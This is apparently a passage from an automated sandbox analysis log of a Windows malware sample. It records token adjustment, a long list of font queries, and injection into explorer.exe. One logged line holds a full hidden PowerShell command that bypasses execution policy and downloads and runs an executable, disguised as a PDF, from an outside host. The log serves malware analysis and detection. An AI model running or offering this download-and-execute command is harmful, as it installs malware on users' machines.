          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0135A537 mov eax, dword ptr fs:[00000030h]29_2_0135A537
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h]29_2_01304D3B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h]29_2_01304D3B
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Users\Public\oftmhayq.exe Process token adjusted: Debug
          Source: C:\Users\Public\oftmhayq.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          Bypasses PowerShell execution policy
          Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\oftmhayq.exe Memory written: C:\Users\Public\oftmhayq.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\oftmhayq.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\oftmhayq.exe Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\oftmhayq.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
          Source: C:\Users\Public\oftmhayq.exe Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
          Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 0000001F.00000000.506248785.0000000006860000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Users\Public\oftmhayq.exe VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Users\Public\oftmhayq.exe VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
